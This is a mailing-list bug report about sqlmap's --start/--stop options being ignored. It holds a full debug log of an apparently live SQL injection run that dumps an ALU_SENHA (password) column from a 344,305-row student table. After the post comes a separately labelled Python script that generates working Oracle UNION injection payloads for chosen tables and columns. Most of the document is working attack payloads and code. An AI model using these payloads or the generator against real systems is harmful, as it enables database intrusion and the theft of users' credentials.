[sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
From: David G. <sk...@gm...> - 2010-04-24 02:02:30
Syntax that had problems:

$ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v 2

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 22:52:50

[22:52:50] [DEBUG] initializing the configuration
[22:52:50] [DEBUG] initializing the knowledge base
[22:52:50] [DEBUG] cleaning up configuration parameters
[22:52:50] [DEBUG] setting the HTTP timeout
[22:52:50] [DEBUG] setting the HTTP method to GET
[22:52:50] [DEBUG] creating HTTP requests opener object
[22:52:50] [DEBUG] parsing XML queries file
[22:52:50] [INFO] using '/path/session' as session file
[22:52:50] [INFO] resuming injection point 'GET' from session file
[22:52:50] [INFO] resuming injection parameter 'a' from session file
[22:52:50] [INFO] resuming injection type 'stringsingle' from session file
[22:52:50] [INFO] resuming 0 number of parenthesis from session file
[22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file
[22:52:50] [INFO] resuming union comment '--' from session file
[22:52:50] [INFO] resuming union count 15 from session file
[22:52:50] [INFO] resuming union position 1 from session file
[22:52:50] [INFO] resuming union false condition 1 from session file
[22:52:50] [INFO] testing connection to the target url
[22:52:50] [DEBUG] got HTTP error code: 500
[22:52:50] [WARNING] the testable parameter 'a' you provided is not into the Cookie
[22:52:50] [INFO] testing for parenthesis on injectable parameter
[22:52:50] [DEBUG] skipping test for MySQL
[22:52:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

[22:52:50] [WARNING] on Oracle it is only possible to enumerate if you provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' as database name
[22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table 'ALU_ALUNOS' on database 'USERS'
[22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are in front of a partial inband sql injection
[22:52:50] [INFO] read from file '/path': 344305
[22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM ALU_ALUNOS-- AND 'RFOj'='RFOj
[22:52:51] [DEBUG] performed 1 queries in 0 seconds
[22:52:51] [INFO] the SQL query provided returns 344305 entries
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli
[22:52:51] [DEBUG] performed 2 queries in 0 seconds
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- AND 'EXyf'='EXyf
[22:52:53] [DEBUG] performed 3 queries in 1 seconds
[22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- AND 'CLyw'='CLyw
[22:52:56] [DEBUG] performed 4 queries in 2 seconds
[22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- AND 'nHQn'='nHQn
[22:52:57] [DEBUG] performed 5 queries in 0 seconds
[22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- AND 'iNmX'='iNmX
[22:52:58] [DEBUG] performed 6 queries in 1 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- AND 'mVQM'='mVQM
[22:52:58] [DEBUG] performed 7 queries in 0 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- AND 'FuqF'='FuqF
[22:52:59] [DEBUG] performed 8 queries in 0 seconds
[22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- AND 'utPd'='utPd
[22:53:01] [DEBUG] performed 9 queries in 2 seconds
[22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- AND 'ilBw'='ilBw
[22:53:03] [DEBUG] performed 10 queries in 2 seconds
[22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- AND 'YxAK'='YxAK
^C
[22:53:04] [ERROR] user aborted

[*] shutting down at: 22:53:04

As you can see, it does not stop querying at the fourth entry, ignoring the parameters passed in ("--start" and "--stop"). I hit Ctrl+C during the tenth query. Am I doing something wrong, or is it like that anyway?

$ svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1588
Node Kind: directory
Schedule: normal
Last Changed Author: inquisb
Last Changed Rev: 1588
Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010)

--
David Gomes Guimarães
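Added example, not part of the post above and not sqlmap's own code: a small Python script that rebuilds the Oracle ROWNUM-subquery UNION payloads the -v 2 log shows (one request per row, selected with `WHERE LIMIT=<n>`) for an inclusive row range, and that scans such a log for the `LIMIT=<n>` values actually requested so they can be checked against the --start/--stop that was passed. The marker strings "iMSFxJ", "aFOQFT" and "MkRkjc" are decoded from the CHR() chains in the log; that the range is 1-based and inclusive, and the fixed trailing `'qGli'='qGli` condition (sqlmap randomises it per request), are assumptions made here.

```python
"""Oracle row-at-a-time UNION payloads of the kind seen in the sqlmap log above.

Added example written for this page; it is not sqlmap's code. Assumptions made
here (not stated in the post): the marker strings are the constants decoded from
the log's CHR() chains, the ROWNUM subquery returns exactly one row per request,
the requested range is 1-based and inclusive, and the trailing 'x'='x condition
is fixed (sqlmap randomises it for every request).
"""
import re

# Constructed sample: the row-1 query copied verbatim from the posted -v 2 log,
# followed by abbreviated copies of the later query lines (only LIMIT=<n> matters).
LOG_ROW1_QUERY = (
    "' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)"
    "||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)"
    "||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)"
    "||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, "
    "NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, "
    "ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli"
)
SAMPLE_LOG = "[22:52:51] [DEBUG] query: " + LOG_ROW1_QUERY + "\n" + "".join(
    f"[hh:mm:ss] [DEBUG] query: ' UNION ALL SELECT ... WHERE LIMIT={n}-- AND 'x'='x\n"
    for n in range(2, 11)
)


def chr_concat(text: str) -> str:
    """Encode text as an Oracle CHR()||CHR() chain, the way the log's markers are built."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def decode_chr_chain(expr: str) -> str:
    """Reverse of chr_concat: CHR(105)||CHR(77)||... back to the marker text."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", expr))


def oracle_row_payload(table, columns, row, union_count=15, position=1,
                       prefix="iMSFxJ", sep="aFOQFT", suffix="MkRkjc", tail="qGli"):
    """Build the UNION payload that fetches exactly one row (ROWNUM == row).

    position is the 0-based UNION column that carries the data (the log's
    'union position 1' puts it in the second slot); the rest are NULL.
    """
    col_expr = chr_concat(prefix)
    for i, col in enumerate(columns):
        if i:
            col_expr += "||" + chr_concat(sep)          # field separator marker
        col_expr += f"||NVL(CAST({col} AS VARCHAR(4000)), CHR(32))"
    col_expr += "||" + chr_concat(suffix)               # end-of-row marker
    cells = ["NULL"] * union_count
    cells[position] = col_expr
    inner = f"SELECT {', '.join(columns)}, ROWNUM AS LIMIT FROM {table}"
    return (f"' UNION ALL SELECT {', '.join(cells)} FROM ({inner}) "
            f"WHERE LIMIT={row}-- AND '{tail}'='{tail}")


def payloads_for_range(table, columns, start, stop, **kw):
    """Payloads for rows start..stop inclusive: what --start/--stop should limit to."""
    return [oracle_row_payload(table, columns, r, **kw) for r in range(start, stop + 1)]


def requested_rows(log_text: str):
    """Every LIMIT=<n> that appears in the [DEBUG] query lines of a -v 2 log."""
    return [int(n) for n in re.findall(r"WHERE LIMIT=(\d+)--", log_text)]


def rows_outside_range(log_text: str, start: int, stop: int):
    """Row numbers the tool requested although they fall outside start..stop."""
    return [r for r in requested_rows(log_text) if r < start or r > stop]


if __name__ == "__main__":
    print("row marker:", decode_chr_chain(LOG_ROW1_QUERY.split("||NVL")[0]))
    for p in payloads_for_range("ALU_ALUNOS", ["ALU_RA", "ALU_SENHA"], 1, 4):
        print(p[:60], "...", p[-40:])
    print("rows requested beyond --stop 4:", rows_outside_range(SAMPLE_LOG, 1, 4))
```

Running it against the constructed log reports rows 5 to 10 as requested beyond the range, which is the symptom described in the post; against a run where --start/--stop is honoured the list is empty.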